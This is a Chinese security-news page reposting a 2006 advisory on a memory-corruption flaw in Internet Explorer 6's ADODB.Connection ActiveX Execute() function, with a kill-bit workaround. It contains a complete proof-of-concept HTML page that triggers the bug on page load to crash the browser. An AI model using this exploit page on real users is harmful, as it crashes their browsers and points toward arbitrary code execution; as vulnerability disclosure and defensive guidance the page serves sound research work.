 |
IE ADODB.Connection对象Execute函数内存破坏漏洞 |
|
|
| IE ADODB.Connection对象Execute函数内存破坏漏洞 |
|
| 作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-26 15:07:50 |
|
2006-11-4 11:58:31
发布日期:2006-10-24
更新日期:2006-10-30
受影响系统:Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0 描述:
BUGTRAQ ID: 20704
Internet Explorer是微软发布的非常流行的WEB浏览器。
IE中ADODB.Connection ActiveX对象的Execute()函数存在内存破坏漏洞,允许远程攻击者通过诱骗用户访问恶意WEB页面或HTML文档导致浏览器崩溃或执行任意代码。
<*来源:YAG KOHHA (skyhole@gmail.com)
链接:http://blogs.technet.com/msrc/archive/2006/10/27/adodb-connection-poc-published.aspx
http://www.kb.cert.org/vuls/id/589272
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! <!--
// Internet Explorer 'ADODB.Connection' object 'Execute' Function
Vulnerability POC
// tested on Windows XP SP1/XP SP2, IE 6.0 with latest patches installed
// Author: YAG KOHHA (skyhole [at] gmail.com)
// Greetz: H D Moor, Dark Eagle, str0ke, Maxus, Fuchunic, Offtopic
// Access violation at:
// ----------------------------------------------------
// 77114D0F 66:8B75 00 MOV SI,WORD PTR SS:[EBP]
// ----------------------------------------------------
// P.S. It`s will be fast with some shellcode :P
--!>
<html>
<head>
<title>ADODB.Connection.Execute CRASH TEST</title>
</head>
<script>
function Bang_Bang() {
var a = new ActiveXObject('ADODB.Connection.2.7');
var b = 'FUCK';
while (b.length <= 1024*256) b+=b;
for (var i = 0; i < 32768; i++)
try { a.Execute(b,b,b); } catch(e) {}
}
</script>
<body onLoad='Bang_Bang()'>
<center><h1>WOW!!! Are U live?</h1></center>
</body></html>
建议:
临时解决方法:
* 在Internet Explorer中禁用ADODB.Connection ActiveX控件。为以下CLSID设置kill bit:
{00000514-0000-0010-8000-00AA006D2EA4}
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp
|
|
| 新闻录入:admin 责任编辑:admin |
|
|
上一篇新闻: HP NonStop Server非授权目录访问漏洞
下一篇新闻: Yukihiro Matsumoto Ruby CGI模块畸形MIME数据拒绝服务漏洞 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
